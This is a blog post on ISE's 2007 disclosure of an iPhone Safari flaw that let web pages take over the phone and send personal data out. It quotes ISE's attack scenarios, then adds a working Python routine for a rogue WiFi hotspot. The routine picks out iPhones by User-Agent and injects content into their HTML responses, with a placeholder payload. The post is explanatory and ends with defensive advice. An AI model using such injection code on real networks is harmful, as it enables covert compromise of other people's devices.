Remote control flaw found in iPhone
Independent Security Evaluators discovered the problem, developed a patch and alerted Apple to the exploits on 17 July 2007. Vulnerability details will be withheld until 2 August to allow Apple to patch the vulnerabilities.
ISE reports that "The most glaring is that all processes of interest run with administrative privileges. This implies that a compromise of any application gives an attacker full access to the device."
Why on earth would Apple grant so many processes admin rights? Did they learn nothing from watching the rest of us struggle with security problems made worse by programs that insist on running with admin rights? Have they not heard of Susan Bradley's Local Administrator/Power User/Non support of Patching/UAC Hall of Shame?
ISE goes on to report that:
"To demonstrate these security weaknesses, we created an exploit for the Safari browser on the iPhone. We used an unmodified iPhone to surf to a malicious HTML document that we created. When this page was viewed, the payload of the exploit forced the iPhone to make an outbound connection to a server we controlled. The compromised iPhone then sent personal data including SMS text messages, contact information, call history, and voice mail information over this connection. All of this data was collected automatically and surreptitiously. After examination of the filesystem, it is clear that other personal data such as passwords, emails, and browsing history could be obtained from the device. We only retrieved some of the personal data but could just as easily have retrieved any information off the device.
Additionally, we wrote a second exploit that performs physical actions on the phone. When we viewed a second HTML page in our iPhone, it ran the second exploit payload which forced it to make a system sound and vibrate the phone for a second. Alternatively, by using other API functions we discovered, the exploit could have dialed phone numbers, sent text messages, or recorded audio (as a bugging device) and transmitted it over the network for later collection by a malicious party."
Attack scenarios
Email - "A link to a malicious site can be included in an email sent to the victim. When the victim clicks the link, they will be taken to the webserver containing the malicious HTML and the exploit will take control of their device."
Man in the middle - "An attacker could set up and advertise a free WiFi hotspot in a heavily populated area. The iPhone will automatically seek these out and ask the user to connect to them. Once connected, all traffic from the victim will pass through the attacker controlled wireless router. The attacker can intercept and change any HTTP traffic intended for the victim. This traffic can invisibly be modified to contain the iPhone exploit code. Again, complete control will be obtained over the iPhone. This time the only actions performed by the victim include using an unsafe WiFi connection and surfing to any website. This last scenario is aided by the fact that iPhones advertise their existence via HTTP headers. In this manner the exploit code can be delivered only to iPhones and not other devices and browsers."
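The mechanics of that last scenario, as an added example that is not ISE's code and not taken from the report: a hostile hotspot sees every plaintext HTTP request, reads the User-Agent header, and only rewrites HTML responses bound for a client that identifies itself as an iPhone, fixing up Content-Length so the tampered page still parses. The request, response and User-Agent strings below are constructed for the example (the UA token checked for is assumed to be "iPhone"), and the injected payload is a harmless placeholder comment standing in for the exploit HTML, which is not reproduced.

```python
"""Selective HTTP response tampering keyed on the client's User-Agent.

Added example (not from the ISE report): models a rogue WiFi hotspot that
rewrites HTML responses only for requests whose User-Agent says "iPhone".
The payload is a harmless placeholder comment, not exploit code.
"""

# Constructed sample traffic for the example. The iPhone UA string is
# assumed to contain the token "iPhone"; desktop Safari does not.
IPHONE_REQUEST = (
    b"GET / HTTP/1.1\r\n"
    b"Host: example.test\r\n"
    b"User-Agent: Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) "
    b"AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3\r\n"
    b"\r\n"
)
DESKTOP_REQUEST = (
    b"GET / HTTP/1.1\r\n"
    b"Host: example.test\r\n"
    b"User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/419 Safari/419\r\n"
    b"\r\n"
)
HTML_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html\r\n"
    b"Content-Length: 31\r\n"
    b"\r\n"
    b"<html><body>Hello</body></html>"
)
PAYLOAD = b"<!-- injected placeholder -->"  # stands in for the exploit HTML


def parse_request_headers(raw: bytes) -> dict:
    """Parse the header block of a raw HTTP/1.x request; names lower-cased."""
    head, _, _ = raw.partition(b"\r\n\r\n")
    headers = {}
    for line in head.split(b"\r\n")[1:]:      # skip the request line
        name, sep, value = line.partition(b":")
        if sep:
            headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return headers


def is_iphone(headers: dict) -> bool:
    """Target selection: the device advertises itself in User-Agent (assumed token)."""
    return "iphone" in headers.get("user-agent", "").lower()


def inject_into_html(response: bytes, payload: bytes) -> bytes:
    """Insert payload before </body> (or append) and rewrite Content-Length.

    Non-HTML or header-less responses are passed through untouched.
    """
    head, sep, body = response.partition(b"\r\n\r\n")
    if not sep or b"text/html" not in head.lower():
        return response
    idx = body.lower().rfind(b"</body>")
    new_body = body + payload if idx == -1 else body[:idx] + payload + body[idx:]
    new_head = []
    for line in head.split(b"\r\n"):
        if line.lower().startswith(b"content-length:"):
            line = b"Content-Length: " + str(len(new_body)).encode("ascii")
        new_head.append(line)
    return b"\r\n".join(new_head) + b"\r\n\r\n" + new_body


def content_length_consistent(response: bytes) -> bool:
    """Check that the declared Content-Length matches the actual body size."""
    head, sep, body = response.partition(b"\r\n\r\n")
    if not sep:
        return False
    for line in head.split(b"\r\n"):
        if line.lower().startswith(b"content-length:"):
            return int(line.split(b":", 1)[1].strip()) == len(body)
    return False


def hotspot_proxy(request: bytes, response: bytes, payload: bytes = PAYLOAD) -> bytes:
    """The hotspot's decision: tamper only with traffic from an iPhone."""
    if is_iphone(parse_request_headers(request)):
        return inject_into_html(response, payload)
    return response


if __name__ == "__main__":
    print(hotspot_proxy(IPHONE_REQUEST, HTML_RESPONSE).decode("latin-1"))
    print(hotspot_proxy(DESKTOP_REQUEST, HTML_RESPONSE) == HTML_RESPONSE)
```

The targeting step is what makes the attack quiet: a desktop on the same hotspot sees unmodified pages, so nothing looks wrong to bystanders. The same `content_length_consistent` style of check, or better, fetching the page over a trusted path and comparing, is how a defender spots an injecting hotspot; the only real fix at the time was HTTPS or not browsing on untrusted WiFi.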
ISE's full report can be downloaded here:
http://www.securityevaluators.com/iphone/exploitingiphone.pdf